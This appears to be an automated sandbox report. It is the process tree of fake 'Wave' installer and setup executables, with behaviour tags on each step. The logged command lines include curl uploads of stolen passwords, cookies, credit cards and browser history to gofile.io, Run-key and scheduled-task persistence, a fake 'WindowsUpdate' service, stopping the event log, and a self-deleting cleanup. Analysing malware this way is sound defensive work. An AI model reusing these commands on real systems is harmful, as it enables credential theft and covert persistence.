  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1708
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WaveInstaller\" -spe -an -ai#7zMap1125:88:7zEvent12135
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5452
- C:\Users\Admin\Downloads\WaveInstaller\WaveInstaller.exe
  "C:\Users\Admin\Downloads\WaveInstaller\WaveInstaller.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5100
- - C:\ProgramData\WaveInstaller.exe
    "C:\ProgramData\WaveInstaller.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5492
  - - C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3624
    - - C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe
        
        "C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6028
      - C:\Users\Admin\AppData\Local\Luau Language Server\node.exe
        
        "C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=6028
        6⤵
        Executes dropped EXE
        
        PID:2636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4868
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6028 -s 2220
        6⤵
        Program crash
        
        PID:4904
- - C:\ProgramData\WaveCrack.exe
    "C:\ProgramData\WaveCrack.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5864
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:3480
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2212
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:5740
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5336
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:4696
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsUpdate"
      4⤵
      Launches sc.exe
      PID:2000
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\ndfjsdloamfk\gptwlkqtlame.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:5384
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5824
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsUpdate"
      4⤵
      Launches sc.exe
      PID:900
- - C:\ProgramData\WavePatcher.exe
    "C:\ProgramData\WavePatcher.exe"
    3⤵
    - Executes dropped EXE
    PID:768
  - - C:\ProgramData\WavePatcher.exe
      "C:\ProgramData\WavePatcher.exe"
      4⤵
      Executes dropped EXE
      PID:556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:436
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
        5⤵
        
        PID:4376
      - C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
        6⤵
        Modifies registry key
        
        PID:6048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
        5⤵
        
        PID:532
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:5228
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:4748
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:3516
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:2952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:5284
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:3080
- - C:\ProgramData\XClient.exe
    "C:\ProgramData\XClient.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2220
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WaveUpdater" /tr "C:\ProgramData\WaveUpdater.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4836
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WaveInstaller\vault\cookies.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1868
- C:\ProgramData\WavePatcher.exe
  "C:\ProgramData\WavePatcher.exe"
  2⤵
  - Executes dropped EXE
  PID:4484
- - C:\ProgramData\WavePatcher.exe
    "C:\ProgramData\WavePatcher.exe"
    3⤵
    - Executes dropped EXE
    PID:5412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:1172
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
      4⤵
      PID:2172
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4376
    - - C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
        5⤵
        Modifies registry key
        
        PID:3040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
      4⤵
      PID:3476
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5420
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:1980
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5440
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1980 -s 316
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:5492
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1764
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:3264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:5832
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5240
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:2100
- C:\ProgramData\XClient.exe
  "C:\ProgramData\XClient.exe"
  2⤵
  - Executes dropped EXE
  PID:2924
- C:\ProgramData\WaveCrack.exe
  "C:\ProgramData\WaveCrack.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:408
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1616
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1680
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5860
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4652
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4696
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4732
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2124
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4332
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:1884
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1612
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:876
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WindowsUpdate"
    3⤵
    - Launches sc.exe
    PID:5756
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4724
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WaveInstaller\vault\web_history.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3512
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WaveInstaller\vault\web_history.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3092
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WaveInstaller\vault\downloads.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2344
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WaveInstaller\vault\web_history.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4160
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Setup5.0\" -spe -an -ai#7zMap11750:78:7zEvent28891
  2⤵
  PID:2424
- C:\Users\Admin\Downloads\Setup5.0\setup7.0\setup7.0.exe
  "C:\Users\Admin\Downloads\Setup5.0\setup7.0\setup7.0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4276
- - C:\Users\Admin\Downloads\Setup5.0\setup7.0\setup7.0.exe
    C:\Users\Admin\Downloads\Setup5.0\setup7.0\setup7.0.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    PID:5324
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Downloads\Setup5.0\setup7.0\setup7.0.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:3060
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1728
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5332
- C:\Users\Admin\Downloads\WaveInstaller.exe
  "C:\Users\Admin\Downloads\WaveInstaller.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4408
- - C:\Users\Admin\AppData\Local\Wave\troubleshoot.exe
    "C:\Users\Admin\AppData\Local\Wave\troubleshoot.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3628
  - - C:\Users\Admin\AppData\Local\Wave\troubleshoot.exe
      "C:\Users\Admin\AppData\Local\Wave\troubleshoot.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:1292
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5560
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:4204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5976
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5884
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:3704
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6088
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:1004
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:2172
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1780
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:1180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5460
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5220
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:2968
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2532
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:1136
- - C:\Users\Admin\AppData\Local\Wave\update.exe
    "C:\Users\Admin\AppData\Local\Wave\update.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    PID:5972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WaveBootstrapper" /tr '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveBootstrapper.exe"' & exit
      4⤵
      PID:1080
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5872
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WaveBootstrapper" /tr '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveBootstrapper.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE60D.tmp.bat""
      4⤵
      PID:3576
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5864
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1476
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveBootstrapper.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveBootstrapper.exe"
        5⤵
        Executes dropped EXE
        
        PID:116
- - C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3692
  - - C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe
      "C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6072
    - - C:\Users\Admin\AppData\Local\Luau Language Server\node.exe
        
        "C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=6072
        5⤵
        Executes dropped EXE
        
        PID:4176
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 1928
        5⤵
        Program crash
        
        PID:1676
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WaveInstaller\vault\downloads.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3896
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_vault.zip\downloads.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4076
- C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe
  "C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3564
- - C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe
    "C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Checks for any installed AV software in registry
    - System Location Discovery: System Language Discovery
    PID:6020
  - - C:\Users\Admin\AppData\Local\Luau Language Server\node.exe
      "C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=6020
      4⤵
      Executes dropped EXE
      PID:5448
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5420
  - - C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
      "C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:1580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  PID:1020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd35e446f8,0x7ffd35e44708,0x7ffd35e44718
    3⤵
    PID:5012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2284 /prefetch:2
    3⤵
    PID:6012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 /prefetch:3
    3⤵
    PID:4964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:8
    3⤵
    PID:5864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
    3⤵
    PID:5000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
    3⤵
    PID:4112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
    3⤵
    PID:3416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
    3⤵
    PID:1960
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
    3⤵
    PID:5472
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
    3⤵
    PID:2612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,1692809924592621216,1623586327720190105,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3844 /prefetch:2
    3⤵
    PID:1856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3608

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3788

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3944

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4968

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:432

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
